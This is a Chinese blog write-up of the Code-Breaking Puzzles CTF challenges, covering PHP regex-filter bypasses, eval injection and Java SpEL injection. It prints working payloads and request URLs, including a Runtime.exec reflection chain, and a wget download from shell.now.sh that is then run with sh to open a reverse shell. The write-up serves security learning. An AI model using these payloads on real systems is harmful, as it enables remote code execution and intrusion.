Code-Breaking Puzzles 做题记录

最新推荐文章于 2022-11-22 12:09:29 发布
最新推荐文章于 2022-11-22 12:09:29 发布
阅读量3.5k 收藏
点赞数
分类专栏: Web 安全 Java PHP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fnmsd/article/details/84556522
版权
安全 同时被 3 个专栏收录
22 篇文章 2 订阅
订阅专栏
Java
18 篇文章 3 订阅
订阅专栏
Web
3 篇文章 0 订阅
订阅专栏

代码审计圈子里看到Code-Breaking Puzzles,跟着学习着做下。
地址:https://code-breaking.com/
给P神的代码审计圈子打个广告,199元你买不了吃亏买不了上当:
在这里插入图片描述

easy - pcrewaf

这个题最开始做上来的,但是做出来了个非预期解。
最开始的题目:

<?php
function is_php($data){
    return preg_match('/<\?.*[\(\`].*/is', $data);
}

if(empty($_FILES)) {
    die(show_source(__FILE__));
}
var_dump($_FILES);
$user_dir = 'data/' . md5($_SERVER['REMOTE_ADDR']);
$data = file_get_contents($_FILES['file']['tmp_name']);
if (is_php($data)) {
    echo "bad request";
} else {
    @mkdir($user_dir, 0755);
    $path = $user_dir . '/' . random_int(0, 10) . '.php';
    move_uploaded_file($_FILES['file']['tmp_name'], $path);

    header("Location: $path", true, 303);
} ?>

只要求不用括号和返单引号,想到了使用include,最后先上传了一个base64后的一句话,然后用include+filter进行包含:

<?
include 'php://filter/convert.base64-decode/resource=10.php';
?>

不太知道为什么直接菜刀连接不上去,最后直接用glob+file_get_contents拿到了flag

chopper=var_dump(glob('../../../*'));
chopper=var_dump(file_get_contents('../../../flag_php7_2_1s_c0rrect'));

后来is_php进行了修改:

function is_php($data){
    return preg_match('/<\?.*[(`;?>].*/is', $data);
}

预期解法是利用PHP默认pcre最大回溯10w次(pcre.backtrack_limit=100000),令正则匹配上传内容时回溯超过10w从而匹配失败。

具体解析p神已经发了博客:
https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html

easy - phplimit

题目:

<?php
var_dump(__FUNCTION__);
//echo get_defined_vars();
echo  preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']);
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
} else {
	echo"\nerror";
//    show_source(__FILE__);
}

正则允许无限的无参数函数嵌套,并且去掉嵌套的函数以后只剩一个分号。

记得好像有个能获取全局所有变量的函数,查手册查到get_defined_vars函数,结合数组操作函数current、array_values可以拿到GET中的第一个参数(所以a那个参数要在code前面,因为用了array_values所以叫什么无所谓)。

最后的请求:

http://51.158.75.42:8084/?a=var_dump(glob(%27./../*%27));&code=eval(current(array_values(current(array_values(get_defined_vars())))));

http://51.158.75.42:8084/?a=var_dump(glob('./../flag_phpbyp4ss'));&code=eval(current(array_values(current(array_values(get_defined_vars())))));

easy - function

题目:

<?php
$action = $_GET['action'] ?? '';
$arg = $_GET['arg'] ?? '';

if(preg_match('/^[a-z0-9_]*$/isD', $action)) {
    show_source(__FILE__);
} else {
    $action('', $arg);
}

需要action不能完全由数字字母下划线组成,想到了命名空间这回事,函数前面加个\就可以用了。

利用create_function函数进行代码执行,
参考:
http://blog.51cto.com/lovexm/1743442
懒一下,直接写结果:

http://51.158.75.42:8087/?action=\create_function&arg=2;}var_dump(glob(%27./../*%27));/*

http://51.158.75.42:8087/?action=\create_function&arg=2;}var_dump(file_get_contents(%27./../flag_h0w2execute_arb1trary_c0de%27));/*

medium - javacon

这个题我想用idea调试来的,参考网上远程调试的文章,并且也把jar文件导入到项目里,最后下了断点还是不停,就先静态看了。。

题目有点类似Shiro反序列化漏洞的利用,Shiro的rememberMe存的是加密后的序列化对象,这个存的是加密后的SPEL。

题目从Cookie中获取remember-me参数并解密:
在这里插入图片描述

在getAdvanceValue函数中进行过滤+执行:
在这里插入图片描述
过滤规则及加密key:
在这里插入图片描述
一般利用java.lang.Runtime.getRuntime().exec(cmd)来执行命令,利用反射来绕过黑名单,最后得到EL:

#{''.getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('ex'+'ec',''.getClass()).invoke(''.getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('getRu'+'ntime').invoke(null),'xxxxx')}

加密代码:

String a="#{''.getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('ex'+'ec',''.getClass()).invoke(''.getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('getRu'+'ntime').invoke(null),'sh /tmp/414.sh')}";
        String b=encrypt("c0dehack1nghere1", "0123456789abcdef", a);
        System.out.println(b);

用dnslog测了下可以外连,用之前代码审计圈子提过的shell.now.sh反弹了shell。

似乎是因为http://jackson.thuraisamy.me/runtime-exec-payloads.html编码后的结果包含{},导致EL没法正常执行,最后分成了两条命令:

wget https://shell.now.sh/47.123.123.123:12345 -O /tmp/414.sh
sh /tmp/414.sh

提交:
在这里插入图片描述
拿到了flag
在这里插入图片描述

fnmsd
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java敏捷开发(王伟杰译)
07-19
用于Java的开发,很实用的,希望可以帮助你们,给好评
Advent-Of-Code-Puzzles
04-04
代码仓库的出现 我想要一个回购品来存储我的Advent of Code拼图解决方案。 最初至少可以在上找到原始问题。
代码审计思路之PHP代码审计
kali_Ma的博客
01-13 2147
00×0 前言 最近也是边挖src边审计代码,总结下最近的php代码审计的一些思路,我一般按照顺序往下做,限于能力水平,可能会有不对或者欠缺的地方,希望各位师傅能够指导。 00×1 前期工作,需要的工具(我使用的) PHPStorm|是PHP编程语言开发的集成环境。 Fotify|代码审计静态扫描工具,商业化静态代码扫描工具,误报率相对较低。 seay|源代码审计工具 CodeQl | 高效的QL非商业的开源代码自动化审计工具。 xcheck| Xcheck 是一款静态应用安全测试工具,旨在及时发现业务代码
php代码审计入门
m0_53087192的博客
01-06 331
代码审计工具 个人比较喜欢使用sublime编辑器和法师的seay源代码审计系统。 代码审计思路 主要思路有三种:1.参数的正向追踪,2.参数的逆向追踪,3.通读全文。 在审计过程中,将黑盒测试与白盒测试结合到一起,黑盒测试在代码审计中是非常重要的,burp一定要常开!!! 一.逆向追踪 找到危险函数或者sql语句中的参数,并且回溯参数,查看参数是否用户可控,如果用户可控,利用黑盒测试构造payload,进行漏洞验证。 二.正向追踪 找到用户可控的参数,并追踪参数,查看参数有没有带入到一些危险函数,或者sq
CTF平台题库writeup(四)--BugKuCTF-代码审计(14题详解)
渗透、攻防、CTF、编程
07-04 4301
1、extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> 知识点: 变量覆盖 file_get_contents():将整个文件读入一个字符串 trim()去除字符串两侧的空格或者指定
18年护网杯 Easy Laravel Writeup
Tel_milk的博客
11-22 948
2018护网杯Easy Laravel Writeup,CTF平台攻防世界,难度10
高级PHP应用程序漏洞审核技术
王意林的专栏
10-27 7983
by: 80vul.com 目录  [隐藏] 1 前言2 传统的代码审计技术3 PHP版本与应用代码审计4 其他的因素与应用代码审计5 扩展我们的字典 5.1 变量本身的key5.2 变量覆盖 5.2.1 遍历初始化变量5.2.2 parse_str()变量覆盖漏洞5.2.3 import_request_variables()变量覆盖漏洞
浅谈CTF中代码审计PHP死亡退出
m0re's blog
10-24 1569
前言:遇到一个代码审计的题目,略有思考。记录一下~ 源码就是这样的 <?php $content = '<?php exit; ?>'; $content .= $_POST['data']; file_put_contents($_POST['filename'], $content);
CTF php代码审计 strpos()函数漏洞 XXE漏洞xinclude()
baynk的博客
03-21 3042
这个题之间弄了好一会,都没搞出来,一直没时间,今天下定决定把它做出来!!! <?php highlight_file(__FILE__); class Login { public function __construct($user, $pass) { $this->loginViaXml($user, $pass); } ...
【CSRF技巧拓展】————5、浅谈Session机制及CSRF攻防
Fly_鹏程万里
01-23 1188
在讲解CSRF攻击原理及流程之前,我想先花点时间讲讲浏览器信息传递中的Session机制。 Session机制 Session,中文意思是“会话”。对于“会话”我的理解是客户端与服务端间通信的一种方式,也可以简单的理解为一个用户从打开浏览器开始,访问一个web网站,点击某些超链接,访问某些服务端的资源,然后关闭浏览器的这一整个过程就是一次会话。   早期,客户端与服务端之间的每次信息传递都是...
code-puzzles
03-22
代码难题
code-puzzles:编程挑战与算法
04-07
代码难题 某些编程算法和挑战是CS的基础。 此仓库以几种语言(包括python,bash和SQL)涵盖了此类难题。
JAVA-Puzzles-section.zip_java笔试题
09-19
java智力题,本文档例举了许多在笔试中有很大可能会考核的智力题,主要涉及JAVA逻辑思维能力,以及部分算法
行业教育软件-学习软件-Animated Puzzles3 1.0 英文版.zip
08-01
行业教育软件-学习软件-Animated Puzzles3 1.0 英文版.zip
基于请求/响应对象搜索的Java中间件通用回显方法(针对HTTP)
热门推荐
fnmsd的博客
06-12 1万+
先感谢一下scz大佬给的博客推荐,受宠若惊+10086。 心血来潮有这么个想法,验证一下。 前言 看了很多师傅们在研究针对Java中间件+Java反序列化回显的研究: https://xz.aliyun.com/t/7740 https://xz.aliyun.com/t/7348 https://paper.seebug.org/1233/ (。。。应该还有挺多,就不翻了) 又看到了c0ny1师傅的作品:《java内存对象搜索辅助工具》 配合IDEA在Java应用运行时,对内存中的对象进行搜
《A Saga of Code Executions on Zimbra》RCE漏洞分析+复现过程
fnmsd的博客
03-21 1万+
原文地址: https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html https://paper.tuisec.win/detail/8ac5a3d1efbf40b 下载Zimbra的包: 1.从地址https://www.zimbra.com/downloads/zimbra-collaboration-ope...
Java中间件通用回显方法的问题及处理(7.7更新)
fnmsd的博客
06-21 1万+
之前写的《基于请求/响应对象搜索的Java中间件通用回显方法(针对HTTP)》实际使用情况中会有问题。 目前解决: 1.没有回显/高并发时才有回显 2.Tomcat回显不稳定 3.URLClassLoader加载问题 4.BasicDataSource利用链问题
MySQL JDBC 客户端反序列化漏洞分析
fnmsd的博客
05-20 9970
首发安全客:https://www.anquanke.com/post/id/203086 这几天学习了BlackHat Europe 2019的议题《New Exploit Technique In Java Deserialization Attack》, 膜拜师傅们的同时,做一个简单的漏洞分析。 该漏洞需要能够控制客户端的JDBC连接串,在连接阶段即可触发,无需继续执行SQL语句。 测试代码 需要自行根据版本选择JDBC连接串,最后有基于各版本Connector连接串的总结。 public clas
MySQL JDBC Connector的allowUrlInLocalInfile选项利用
fnmsd的博客
06-01 9916
MySQL JDBC Connector的allowUrlInLocalInfile选项,开启时可以进行SSRF及列目录。客户端文件读取利用的扩展。
用C++产生简单、普通、困难三种难度的数独问题各10题
最新发布
09-12
### 回答1: 以下是用C语言产生简单、普通、困难三种难度的数独问题各10题的代码示例: ```c #include <stdio.h> #include <stdlib.h> #include <time.h> #define N 9 int grid[N][N]; void print_grid() { for (int i = 0; i < N; i++) { for (int j = 0; j < N; j++) { printf("%d ", grid[i][j]); } printf("\n"); } printf("\n"); } void init_grid() { for (int i = 0; i < N; i++) { for (int j = 0; j < N; j++) { grid[i][j] = 0; } } } int check_row(int row, int num) { for (int i = 0; i < N; i++) { if (grid[row][i] == num) { return 0; } } return 1; } int check_col(int col, int num) { for (int i = 0; i < N; i++) { if (grid[i][col] == num) { return 0; } } return 1; } int check_box(int row, int col, int num) { int box_row = row - row % 3; int box_col = col - col % 3; for (int i = 0; i < 3; i++) { for (int j = 0; j < 3; j++) { if (grid[box_row + i][box_col + j] == num) { return 0; } } } return 1; } int check_num(int row, int col, int num) { return check_row(row, num) && check_col(col, num) && check_box(row, col, num); } int solve(int row, int col) { if (row == N) { return 1; } if (col == N) { return solve(row + 1, 0); } if (grid[row][col] != 0) { return solve(row, col + 1); } for (int num = 1; num <= 9; num++) { if (check_num(row, col, num)) { grid[row][col] = num; if (solve(row, col + 1)) { return 1; } grid[row][col] = 0; } } return 0; } void generate(int level) { srand(time(NULL)); int count = 0; while (count < 10) { init_grid(); solve(0, 0); int remove_count = 0; while (remove_count < level) { int row = rand() % 9; int col = rand() % 9; if (grid[row][col] != 0) { int num = grid[row][col]; grid[row][col] = 0; int temp_grid[N][N]; for (int i = 0; i < N; i++) { for (int j = 0; j < N; j++) { temp_grid[i][j] = grid[i][j]; } } if (solve(0, 0)) { remove_count++; } else { grid[row][col] = num; for (int i = 0; i < N; i++) { for (int j = 0; j < N; j++) { grid[i][j] = temp_grid[i][j]; } } } } } printf("Puzzle:\n"); print_grid(); printf("Solution:\n"); solve(0, 0); print_grid(); printf("------------------------------\n"); count++; } } int main() { printf("Generating easy puzzles...\n"); generate(30); // generate 10 easy puzzles printf("Generating medium puzzles...\n"); generate(40); // generate 10 medium puzzles printf("Generating hard puzzles...\n"); generate(50); // generate 10 hard puzzles return 0; } ``` 在上面的代码中,我们使用回溯算法生成数独问题并移除一定数量的数字,以产生简单、普通、困难三种难度的数独问题。其中,移除的数字数量越多,难度越大。在本示例中,我们移除了30个数字以产生简单难度的数独问题,移除了40个数字以产生普通难度的数独问题,移除了50个数字以产生困难难度的数独问题。 ### 回答2: 产生简单、普通和困难难度的数独问题可以通过不同的算法和策略进行。以下是一种可能的方法: 1. 简单难度数独问题: 对于简单难度的数独问题,可以使用简单的算法来生成。例如,可以选择随机生成一个已经填好一部分数字的数独棋盘,然后通过数独的解题算法来填充剩余的空白位置,确保棋盘只有一个解。然后将填充后的数独题目进行抽取,得到10道简单难度的数独问题。 2. 普通难度数独问题: 对于普通难度的数独问题,可以使用更复杂的算法生成。例如,可以使用“挖空”的方法,从一个已经填好的数独棋盘中随机选择一些数字进行清除,直到达到所需的难度。确保棋盘只有一个解。然后将挖空后的数独题目进行抽取,得到10道普通难度的数独问题。 3. 困难难度数独问题: 对于困难难度的数独问题,可以使用更加复杂的算法来生成。例如,可以使用一些高级的求解算法,填充一个完整的数独棋盘,然后进行“打乱”操作,例如重新排列行列、邻居数字的交换等,以增加难度。然后再进行挖空操作,确保棋盘只有一个解。最终得到10道困难难度的数独问题。 通过以上的方法,可以分别生成10道简单、普通和困难难度的数独问题。这些问题将有不同的难度级别,可以满足不同玩家的需求。 ### 回答3: 要用C语言生成三种难度的数独问题,首先需要定义一个数独的数据结构,并编写生成数独的算法。 1. 简单难度的数独问题: 对于简单难度的数独问题,可以先生成一个完整的数独,然后根据不同的难度要求进行细化处理。可以按照以下步骤生成10个简单难度的数独问题: - 生成一个完整的数独解答; - 随机选择一部分已填数字进行删除,以达到简化难度的目的; - 重复上述步骤10次,即可生成10个简单难度的数独问题。 2. 普通难度的数独问题: 普通难度的数独问题相对于简单难度来说,填入的数字更少,生成的难度更高。可以按照以下步骤生成10个普通难度的数独问题: - 生成一个完整的数独解答; - 对已填数字进行减少,保留更少的已填数字; - 重复上述步骤10次,即可生成10个普通难度的数独问题。 3. 困难难度的数独问题: 困难难度的数独问题相对于普通难度来说,生成的数独问题更加复杂。可以按照以下步骤生成10个困难难度的数独问题: - 生成一个完整的数独解答; - 对已填数字进行减少,保留更少的已填数字; - 在生成的数独问题中,引入更多的数独解答的答案,增加数独生成的复杂度; - 重复上述步骤10次,即可生成10个困难难度的数独问题。 以上就是用C语言生成简单、普通和困难三种难度的数独问题的步骤。使用随机选择和适当的问题简化策略,可以生成不同难度的数独问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值